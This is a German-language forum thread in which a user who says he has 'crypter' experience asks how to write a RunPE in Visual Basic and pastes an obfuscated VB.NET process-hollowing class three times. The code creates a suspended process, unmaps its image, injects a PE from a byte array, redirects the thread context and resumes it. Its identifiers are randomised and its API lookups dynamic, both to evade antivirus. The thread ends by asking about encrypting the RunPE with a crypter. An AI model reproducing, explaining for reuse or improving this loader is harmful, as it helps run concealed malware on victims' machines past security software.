Kann mir Jemand villeicht zeigen wie ich selber ein Runpe in Visual Basic Codieren kann.

hat da jemand ahnung davon?

Wie weit bist du denn gekommen bzw. wo hapert es?

Also das problem liegt darin wie ich Anfangen soll den Code zu erlernen, habe schon mit encrypt und decrypt erfahrungen gemacht, Bytes to string usw. funktioniert wunderbar.

aber wenn ich mir so ein Runpe Code anschaue dann komm ich da echt wenig weit vorran,



Habe ein Runpe Code zwar da ist aber veraltet und es gibt ja verschieden codes.

würde gerne kapieren was z.B die einzelnen funktionen, z.b hier das : Public Declare Function dmAWRR Lib "kernel32" Alias "LoadLibraryA" (ByVal eXcI As String) As IntPtr
Public Declare Function ZZvfGU Lib "kernel32" Alias "GetProcAddress" (ByVal HjrC As IntPtr, ByVal eXcI As String) As IntPtr


bedeuten und wie man am besten anfangen soll um selber mal den Code zu schreiben


Hier der ganze Code.

Vielleicht kannn ja jemand mir einzelnt erklären wie und für was was bedeutet.

vielen dank im vorraus.


Imports System.Runtime.InteropServices
Imports System.Text

'''' <summary>
'''' Coder : Rahoz
'''' RunPE Coder : Simon-Binyo
'''' Call : ( byte() , String )
'''' Purpose : Execute App In Memory from byte array
'''' </summary>

Public Class gFDLGDFASKL
Public Declare Function dmAWRR Lib "kernel32" Alias "LoadLibraryA" (ByVal eXcI As String) As IntPtr
Public Declare Function ZZvfGU Lib "kernel32" Alias "GetProcAddress" (ByVal HjrC As IntPtr, ByVal eXcI As String) As IntPtr
Function BUeBsTZDkKEMbrG(Of T)(ByVal eXcI As String, ByVal KAvK As String) As T
Return DirectCast(DirectCast(Marshal.GetDelegateForFuncti onPointer(ZZvfGU(dmAWRR(eXcI), KAvK), GetType(T)), Object), T)
End Function
Delegate Function NOJMkg(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function Luoipi(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr) As UInteger
Delegate Function AAAAA(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr, ByRef bufr As IntPtr, ByVal bufrMWayWhlwz As Integer, ByRef WZwg As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function NTJceg(ByVal GBFWead As IntPtr, ByVal NaQE As IntPtr) As UInteger
Delegate Function RNzQc(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function gNNNNN(ByVal CCPh As IntPtr, ByVal tDjF As IntPtr, ByVal MWayWhlwz As IntPtr, ByVal bQWh As Integer, ByVal oEtR As Integer) As IntPtr
Delegate Function lkgzcI(ByVal CCPhess As IntPtr, ByVal DSvGRqwzF As IntPtr, ByVal Ebkb As Byte(), ByVal nMWayWhlwz As UInteger, ByVal awiftTtgC As Integer) As Boolean
Public Declare Auto Function Pjfqge Lib "kernel32" Alias "CreateProcessW" (ByVal kEDd As String, ByVal SRqF As StringBuilder, ByVal EEXsqPyEy As IntPtr, ByVal fFOp As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal vdEz As Boolean, ByVal bGYB As Integer, ByVal KTKd As IntPtr, ByVal WGiN As String, ByVal meYX As Byte(), ByVal SHsY As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Private Function CeCyARJ(ByVal FsQGol As Long, Optional ByVal zRwHpUb As Long = &H4) As Integer
Dim qZYGUEz As IntPtr
Dim WBiwMxI As Integer
Dim eIfLI As AAAAA = BUeBsTZDkKEMbrG(Of AAAAA)("ntdll", "NtReadVirtualMemory")
Call eIfLI(Process.GetCurrentProcess.Handle, FsQGol, qZYGUEz, zRwHpUb, WBiwMxI)
Return qZYGUEz
End Function
Public Function GNMNioZVtaV(ByVal RIAkWcIh As Byte(), ByVal MRbichBw As String) As Boolean
Try
Dim Wakodbh As GCHandle = GCHandle.Alloc(RIAkWcIh, GCHandleType.Pinned) : Dim hModuleBase As Integer = Wakodbh.AddrOfPinnedObject : Wakodbh.Free()
Dim EEXsqPyEy As IntPtr = IntPtr.Zero
Dim yYEifvEzt As IntPtr() = New IntPtr(3) {}
Dim PXYyxEHcm As Byte() = New Byte(67) {}
Dim klhposaehf As Integer = BitConverter.ToInt32(RIAkWcIh, 60)
Dim BmSklSftl As Integer
Dim EFfDmpqlB As UInteger() = New UInteger(178) {}
EFfDmpqlB(0) = &H10002
Pjfqge(Nothing, New StringBuilder(MRbichBw), EEXsqPyEy, EEXsqPyEy, False, 4, EEXsqPyEy, Nothing, PXYyxEHcm, yYEifvEzt)
Dim gnzWsnHkF As Integer = (hModuleBase + CeCyARJ(hModuleBase + &H3C))
BmSklSftl = CeCyARJ(gnzWsnHkF + &H34)
Dim qfXWO As Luoipi = BUeBsTZDkKEMbrG(Of Luoipi)("ntdll", "NtUnmapViewOfSection")
qfXWO(yYEifvEzt(0), BmSklSftl)
Dim WIqYC As gNNNNN = BUeBsTZDkKEMbrG(Of gNNNNN)("kernel32", "VirtualAllocEx")
Dim DSvGRqwzF As IntPtr = WIqYC(yYEifvEzt(0), BmSklSftl, CeCyARJ(gnzWsnHkF + &H50), &H3000, &H40)
Dim AEhEKTVFO As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + &H34))
Dim MWayWhlwz As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + 80))
Dim bdLBZrKmW As Integer
Dim rszaetz As Integer
Dim api8 As lkgzcI = BUeBsTZDkKEMbrG(Of lkgzcI)("ntdll", "NtWriteVirtualMemory")
api8(yYEifvEzt(0), DSvGRqwzF, RIAkWcIh, CUInt(CInt(CeCyARJ(gnzWsnHkF + &H54))), bdLBZrKmW)
For i = 0 To CeCyARJ(gnzWsnHkF + &H6, 2) - 1
Dim QcXOrDrbL As Integer() = New Integer(9) {}
Buffer.BlockCopy(RIAkWcIh, (klhposaehf + &HF8) + (i * 40), QcXOrDrbL, 0, 40)
Dim ljsdhhds As Byte() = New Byte((QcXOrDrbL(4) - 1)) {}
Buffer.BlockCopy(RIAkWcIh, QcXOrDrbL(5), ljsdhhds, 0, ljsdhhds.Length)
MWayWhlwz = New IntPtr(DSvGRqwzF.ToInt32() + QcXOrDrbL(3))
AEhEKTVFO = New IntPtr(ljsdhhds.Length)
api8(yYEifvEzt(0), MWayWhlwz, ljsdhhds, CUInt(AEhEKTVFO), rszaetz)
Next i
Dim sdfsgt As NOJMkg = BUeBsTZDkKEMbrG(Of NOJMkg)("ntdll", "NtGetContextThread")
sdfsgt(yYEifvEzt(1), EFfDmpqlB)
api8(yYEifvEzt(0), EFfDmpqlB(41) + &H8, BitConverter.GetBytes(DSvGRqwzF.ToInt32()), CUInt(&H4), rszaetz)
EFfDmpqlB(&H2C) = BmSklSftl + CeCyARJ(gnzWsnHkF + &H28)
Dim ihsg As RNzQc = BUeBsTZDkKEMbrG(Of RNzQc)("ntdll", "NtSetContextThread")
ihsg(yYEifvEzt(1), EFfDmpqlB)
Dim ByZcV As NTJceg = BUeBsTZDkKEMbrG(Of NTJceg)("ntdll", "NtResumeThread")
ByZcV(yYEifvEzt(1), 0)
Catch ex As Exception
Return False

Habe gerade ne Antwort

---------- Post added at 17:50 ---------- Previous post was at 17:45 ----------

Bisher haber ich Nur Crypterfahrungen gemacht in VB
Hier ist ein Code mit dem ich mich beschäftige.

der funktioniert bei mir nur ist er Veraltert

würde gern kapier was z.B das hier bedeutet


Public Declare Function dmAWRR Lib "kernel32" Alias "LoadLibraryA" (ByVal eXcI As String) As IntPtr
Public Declare Function ZZvfGU Lib "kernel32" Alias "GetProcAddress" (ByVal HjrC As IntPtr, ByVal eXcI As String) As IntPtr






"Imports System.Runtime.InteropServices
Imports System.Text

'''' <summary>
'''' Coder : Rahoz
'''' RunPE Coder : Simon-Binyo
'''' Call : ( byte() , String )
'''' Purpose : Execute App In Memory from byte array
'''' </summary>

Public Class gFDLGDFASKL
Public Declare Function dmAWRR Lib "kernel32" Alias "LoadLibraryA" (ByVal eXcI As String) As IntPtr
Public Declare Function ZZvfGU Lib "kernel32" Alias "GetProcAddress" (ByVal HjrC As IntPtr, ByVal eXcI As String) As IntPtr
Function BUeBsTZDkKEMbrG(Of T)(ByVal eXcI As String, ByVal KAvK As String) As T
Return DirectCast(DirectCast(Marshal.GetDelegateForFuncti onPointer(ZZvfGU(dmAWRR(eXcI), KAvK), GetType(T)), Object), T)
End Function
Delegate Function NOJMkg(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function Luoipi(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr) As UInteger
Delegate Function AAAAA(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr, ByRef bufr As IntPtr, ByVal bufrMWayWhlwz As Integer, ByRef WZwg As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function NTJceg(ByVal GBFWead As IntPtr, ByVal NaQE As IntPtr) As UInteger
Delegate Function RNzQc(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function gNNNNN(ByVal CCPh As IntPtr, ByVal tDjF As IntPtr, ByVal MWayWhlwz As IntPtr, ByVal bQWh As Integer, ByVal oEtR As Integer) As IntPtr
Delegate Function lkgzcI(ByVal CCPhess As IntPtr, ByVal DSvGRqwzF As IntPtr, ByVal Ebkb As Byte(), ByVal nMWayWhlwz As UInteger, ByVal awiftTtgC As Integer) As Boolean
Public Declare Auto Function Pjfqge Lib "kernel32" Alias "CreateProcessW" (ByVal kEDd As String, ByVal SRqF As StringBuilder, ByVal EEXsqPyEy As IntPtr, ByVal fFOp As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal vdEz As Boolean, ByVal bGYB As Integer, ByVal KTKd As IntPtr, ByVal WGiN As String, ByVal meYX As Byte(), ByVal SHsY As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Private Function CeCyARJ(ByVal FsQGol As Long, Optional ByVal zRwHpUb As Long = &H4) As Integer
Dim qZYGUEz As IntPtr
Dim WBiwMxI As Integer
Dim eIfLI As AAAAA = BUeBsTZDkKEMbrG(Of AAAAA)("ntdll", "NtReadVirtualMemory")
Call eIfLI(Process.GetCurrentProcess.Handle, FsQGol, qZYGUEz, zRwHpUb, WBiwMxI)
Return qZYGUEz
End Function
Public Function GNMNioZVtaV(ByVal RIAkWcIh As Byte(), ByVal MRbichBw As String) As Boolean
Try
Dim Wakodbh As GCHandle = GCHandle.Alloc(RIAkWcIh, GCHandleType.Pinned) : Dim hModuleBase As Integer = Wakodbh.AddrOfPinnedObject : Wakodbh.Free()
Dim EEXsqPyEy As IntPtr = IntPtr.Zero
Dim yYEifvEzt As IntPtr() = New IntPtr(3) {}
Dim PXYyxEHcm As Byte() = New Byte(67) {}
Dim klhposaehf As Integer = BitConverter.ToInt32(RIAkWcIh, 60)
Dim BmSklSftl As Integer
Dim EFfDmpqlB As UInteger() = New UInteger(178) {}
EFfDmpqlB(0) = &H10002
Pjfqge(Nothing, New StringBuilder(MRbichBw), EEXsqPyEy, EEXsqPyEy, False, 4, EEXsqPyEy, Nothing, PXYyxEHcm, yYEifvEzt)
Dim gnzWsnHkF As Integer = (hModuleBase + CeCyARJ(hModuleBase + &H3C))
BmSklSftl = CeCyARJ(gnzWsnHkF + &H34)
Dim qfXWO As Luoipi = BUeBsTZDkKEMbrG(Of Luoipi)("ntdll", "NtUnmapViewOfSection")
qfXWO(yYEifvEzt(0), BmSklSftl)
Dim WIqYC As gNNNNN = BUeBsTZDkKEMbrG(Of gNNNNN)("kernel32", "VirtualAllocEx")
Dim DSvGRqwzF As IntPtr = WIqYC(yYEifvEzt(0), BmSklSftl, CeCyARJ(gnzWsnHkF + &H50), &H3000, &H40)
Dim AEhEKTVFO As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + &H34))
Dim MWayWhlwz As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + 80))
Dim bdLBZrKmW As Integer
Dim rszaetz As Integer
Dim api8 As lkgzcI = BUeBsTZDkKEMbrG(Of lkgzcI)("ntdll", "NtWriteVirtualMemory")
api8(yYEifvEzt(0), DSvGRqwzF, RIAkWcIh, CUInt(CInt(CeCyARJ(gnzWsnHkF + &H54))), bdLBZrKmW)
For i = 0 To CeCyARJ(gnzWsnHkF + &H6, 2) - 1
Dim QcXOrDrbL As Integer() = New Integer(9) {}
Buffer.BlockCopy(RIAkWcIh, (klhposaehf + &HF8) + (i * 40), QcXOrDrbL, 0, 40)
Dim ljsdhhds As Byte() = New Byte((QcXOrDrbL(4) - 1)) {}
Buffer.BlockCopy(RIAkWcIh, QcXOrDrbL(5), ljsdhhds, 0, ljsdhhds.Length)
MWayWhlwz = New IntPtr(DSvGRqwzF.ToInt32() + QcXOrDrbL(3))
AEhEKTVFO = New IntPtr(ljsdhhds.Length)
api8(yYEifvEzt(0), MWayWhlwz, ljsdhhds, CUInt(AEhEKTVFO), rszaetz)
Next i
Dim sdfsgt As NOJMkg = BUeBsTZDkKEMbrG(Of NOJMkg)("ntdll", "NtGetContextThread")
sdfsgt(yYEifvEzt(1), EFfDmpqlB)
api8(yYEifvEzt(0), EFfDmpqlB(41) + &H8, BitConverter.GetBytes(DSvGRqwzF.ToInt32()), CUInt(&H4), rszaetz)
EFfDmpqlB(&H2C) = BmSklSftl + CeCyARJ(gnzWsnHkF + &H28)
Dim ihsg As RNzQc = BUeBsTZDkKEMbrG(Of RNzQc)("ntdll", "NtSetContextThread")
ihsg(yYEifvEzt(1), EFfDmpqlB)
Dim ByZcV As NTJceg = BUeBsTZDkKEMbrG(Of NTJceg)("ntdll", "NtResumeThread")
ByZcV(yYEifvEzt(1), 0)
Catch ex As Exception
Return False"

ich bekomme es nicht hin hier ein Code reinzumachen. Komisch

ich bekomme es nicht hin hier ein Code reinzumachen. Komisch

Woran scheitert es?



Beispielcode

OK denke das es jetzt klappen wird.


Habe mit crypten schon erfahrung, läuft auch soweit gut.


aber wenn ich mir den runpe code anschau verstehe ich da nichts.

habe mir schon einige sachen über process hollowing angeschaut, dabei habe ich wenig gefunden wo mir was beibringen konnte.

würde gerne verstehen was die einyelnen funktionen im runpe code bedeuten und wie man den selber schreiben kann.

am besten über pm

hier der code

Code:


Imports System.Runtime.InteropServices
Imports System.Text

'''' <summary>
'''' Coder : Rahoz
'''' RunPE Coder : Simon-Binyo
'''' Call : ( byte() , String )
'''' Purpose : Execute App In Memory from byte array
'''' </summary>

Public Class gFDLGDFASKL
Public Declare Function dmAWRR Lib "kernel32" Alias "LoadLibraryA" (ByVal eXcI As String) As IntPtr
Public Declare Function ZZvfGU Lib "kernel32" Alias "GetProcAddress" (ByVal HjrC As IntPtr, ByVal eXcI As String) As IntPtr
Function BUeBsTZDkKEMbrG(Of T)(ByVal eXcI As String, ByVal KAvK As String) As T
Return DirectCast(DirectCast(Marshal.GetDelegateForFuncti onPointer(ZZvfGU(dmAWRR(eXcI), KAvK), GetType(T)), Object), T)
End Function
Delegate Function NOJMkg(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function Luoipi(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr) As UInteger
Delegate Function AAAAA(ByVal CCPh As IntPtr, ByVal kPCK As IntPtr, ByRef bufr As IntPtr, ByVal bufrMWayWhlwz As Integer, ByRef WZwg As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function NTJceg(ByVal GBFWead As IntPtr, ByVal NaQE As IntPtr) As UInteger
Delegate Function RNzQc(ByVal GBFW As IntPtr, ByVal EFfDmpqlB As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function gNNNNN(ByVal CCPh As IntPtr, ByVal tDjF As IntPtr, ByVal MWayWhlwz As IntPtr, ByVal bQWh As Integer, ByVal oEtR As Integer) As IntPtr
Delegate Function lkgzcI(ByVal CCPhess As IntPtr, ByVal DSvGRqwzF As IntPtr, ByVal Ebkb As Byte(), ByVal nMWayWhlwz As UInteger, ByVal awiftTtgC As Integer) As Boolean
Public Declare Auto Function Pjfqge Lib "kernel32" Alias "CreateProcessW" (ByVal kEDd As String, ByVal SRqF As StringBuilder, ByVal EEXsqPyEy As IntPtr, ByVal fFOp As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal vdEz As Boolean, ByVal bGYB As Integer, ByVal KTKd As IntPtr, ByVal WGiN As String, ByVal meYX As Byte(), ByVal SHsY As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Private Function CeCyARJ(ByVal FsQGol As Long, Optional ByVal zRwHpUb As Long = &H4) As Integer
Dim qZYGUEz As IntPtr
Dim WBiwMxI As Integer
Dim eIfLI As AAAAA = BUeBsTZDkKEMbrG(Of AAAAA)("ntdll", "NtReadVirtualMemory")
Call eIfLI(Process.GetCurrentProcess.Handle, FsQGol, qZYGUEz, zRwHpUb, WBiwMxI)
Return qZYGUEz
End Function
Public Function GNMNioZVtaV(ByVal RIAkWcIh As Byte(), ByVal MRbichBw As String) As Boolean
Try
Dim Wakodbh As GCHandle = GCHandle.Alloc(RIAkWcIh, GCHandleType.Pinned) : Dim hModuleBase As Integer = Wakodbh.AddrOfPinnedObject : Wakodbh.Free()
Dim EEXsqPyEy As IntPtr = IntPtr.Zero
Dim yYEifvEzt As IntPtr() = New IntPtr(3) {}
Dim PXYyxEHcm As Byte() = New Byte(67) {}
Dim klhposaehf As Integer = BitConverter.ToInt32(RIAkWcIh, 60)
Dim BmSklSftl As Integer
Dim EFfDmpqlB As UInteger() = New UInteger(178) {}
EFfDmpqlB(0) = &H10002
Pjfqge(Nothing, New StringBuilder(MRbichBw), EEXsqPyEy, EEXsqPyEy, False, 4, EEXsqPyEy, Nothing, PXYyxEHcm, yYEifvEzt)
Dim gnzWsnHkF As Integer = (hModuleBase + CeCyARJ(hModuleBase + &H3C))
BmSklSftl = CeCyARJ(gnzWsnHkF + &H34)
Dim qfXWO As Luoipi = BUeBsTZDkKEMbrG(Of Luoipi)("ntdll", "NtUnmapViewOfSection")
qfXWO(yYEifvEzt(0), BmSklSftl)
Dim WIqYC As gNNNNN = BUeBsTZDkKEMbrG(Of gNNNNN)("kernel32", "VirtualAllocEx")
Dim DSvGRqwzF As IntPtr = WIqYC(yYEifvEzt(0), BmSklSftl, CeCyARJ(gnzWsnHkF + &H50), &H3000, &H40)
Dim AEhEKTVFO As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + &H34))
Dim MWayWhlwz As New IntPtr(BitConverter.ToInt32(RIAkWcIh, klhposaehf + 80))
Dim bdLBZrKmW As Integer
Dim rszaetz As Integer
Dim api8 As lkgzcI = BUeBsTZDkKEMbrG(Of lkgzcI)("ntdll", "NtWriteVirtualMemory")
api8(yYEifvEzt(0), DSvGRqwzF, RIAkWcIh, CUInt(CInt(CeCyARJ(gnzWsnHkF + &H54))), bdLBZrKmW)
For i = 0 To CeCyARJ(gnzWsnHkF + &H6, 2) - 1
Dim QcXOrDrbL As Integer() = New Integer(9) {}
Buffer.BlockCopy(RIAkWcIh, (klhposaehf + &HF8) + (i * 40), QcXOrDrbL, 0, 40)
Dim ljsdhhds As Byte() = New Byte((QcXOrDrbL(4) - 1)) {}
Buffer.BlockCopy(RIAkWcIh, QcXOrDrbL(5), ljsdhhds, 0, ljsdhhds.Length)
MWayWhlwz = New IntPtr(DSvGRqwzF.ToInt32() + QcXOrDrbL(3))
AEhEKTVFO = New IntPtr(ljsdhhds.Length)
api8(yYEifvEzt(0), MWayWhlwz, ljsdhhds, CUInt(AEhEKTVFO), rszaetz)
Next i
Dim sdfsgt As NOJMkg = BUeBsTZDkKEMbrG(Of NOJMkg)("ntdll", "NtGetContextThread")
sdfsgt(yYEifvEzt(1), EFfDmpqlB)
api8(yYEifvEzt(0), EFfDmpqlB(41) + &H8, BitConverter.GetBytes(DSvGRqwzF.ToInt32()), CUInt(&H4), rszaetz)
EFfDmpqlB(&H2C) = BmSklSftl + CeCyARJ(gnzWsnHkF + &H28)
Dim ihsg As RNzQc = BUeBsTZDkKEMbrG(Of RNzQc)("ntdll", "NtSetContextThread")
ihsg(yYEifvEzt(1), EFfDmpqlB)
Dim ByZcV As NTJceg = BUeBsTZDkKEMbrG(Of NTJceg)("ntdll", "NtResumeThread")
ByZcV(yYEifvEzt(1), 0)
Catch ex As Exception
Return False
End Try
Return True
End Function
End Class


ein Moderator muss mir die Nachricht erst freischalten mit dem Code

---------- Post added at 23:56 ---------- Previous post was at 22:05 ----------

Kann ich eig. mein runpe Code mit einem Runpe Crypter verschlüsseln, und ganz normal ausführen?